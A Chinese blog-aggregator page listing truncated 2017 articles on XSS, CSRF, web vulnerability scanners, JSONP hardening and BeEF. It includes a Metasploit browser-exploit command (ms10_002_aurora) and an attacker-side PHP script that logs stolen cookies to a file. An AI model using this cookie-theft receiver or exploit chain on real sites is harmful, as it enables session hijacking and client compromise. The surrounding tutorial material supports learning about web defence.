360安全检测出WordPress的漏洞注意有跨站脚本攻击(XSS)漏洞和发现robots文件漏洞,修复方法请见文章内容。 ...
分类:
其他好文 时间:
2017-06-20 14:50:01
阅读次数:
166
1、XSS漏洞 2、CSRF漏洞 这样的攻击方式具体可以由多种形式实现,除了建立欺诈服务器外,还可以使用超链接陷阱。所谓的超链接陷阱,就是指伪造一个可信的链接或者地址,但其实际地址中包含了修改无线路由器参数的请求。 在用户当前成功登录了无线路由器设备,或者当前存在在线的管理员会话的前提下,一旦用户单 ...
分类:
Web程序 时间:
2017-05-27 22:30:06
阅读次数:
263
xss跨站漏洞纯手打笔记(基础) XSS漏洞扫描 常用工具: wvs 椰树 safe3 Xelenium w3af vega xss扫描插件+burp Beef: beef+msf拿客户端shell(ie6 xp) use windows/browser/ms10_002_aurora set PA ...
分类:
其他好文 时间:
2017-05-26 23:25:22
阅读次数:
561
jsonp安全性防范,分为以下几点: 1、防止callback参数意外截断js代码,特殊字符单引号双引号,换行符均存在风险 2、防止callback参数恶意添加标签(如script),造成XSS漏洞 3、防止跨域请求滥用,阻止非法站点恶意调用 针对第三点,我们可以通过来源refer白名单匹配,以及 ...
分类:
Web程序 时间:
2017-05-23 14:20:29
阅读次数:
416
1.Netsparker Community Edition(Windows) 这个程序可以检测SQL注入和跨页脚本事件。当检测完成之后它会给你提供一些解决方案。 2.Websecurify(Windows, Linux, Mac OS X) 这是个简单易用的开源工具,此程序还有一些人插件支持,可以 ...
分类:
Web程序 时间:
2017-05-14 23:44:09
阅读次数:
357
不要轻信用户提交上来的数据alert消息太难看,因此开发一个aspx页面用来统一展示消息ShowMessage.ashx //主页将判断重定向到另一个页面 if (TextBox1.Text != "gao") { Response.Redirect("sey.aspx?Name=密码不正确!"); ...
分类:
其他好文 时间:
2017-05-11 22:27:51
阅读次数:
209
应用普遍转移到B/S架构,浏览器成为统一客户端程序 通过注入JS脚本,利用浏览器攻击其他网站 ruby编写 攻击手段 利用网站XSS漏洞实现攻击 诱使客户端访问含有hook的伪造站点 结合中间人攻击注入hook脚本 常见用途 键盘记录器 网络扫描 浏览器信息收集 绑定shell 与metasploi ...
分类:
其他好文 时间:
2017-05-04 13:28:13
阅读次数:
628
XSS又称CSS,全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。 ...
分类:
其他好文 时间:
2017-04-09 12:43:15
阅读次数:
209
原理:恶意Web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候,程序将数据库里面的信息输出,这些恶意代码就会被执行。 大概流程是,建立一个用于发表评论的网页,然后XSS攻击者通过XSS漏洞进行攻击获取其他访 ...
分类:
其他好文 时间:
2017-04-03 15:26:57
阅读次数:
301
一、跨站获取cookie1,hacker端(hacker.php)的程序如下:<?php$cookie=$_GET[‘cookie‘];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序如下:<html><head><title>xss跨站原理复现</title&..
分类:
其他好文 时间:
2017-03-10 11:18:31
阅读次数:
250
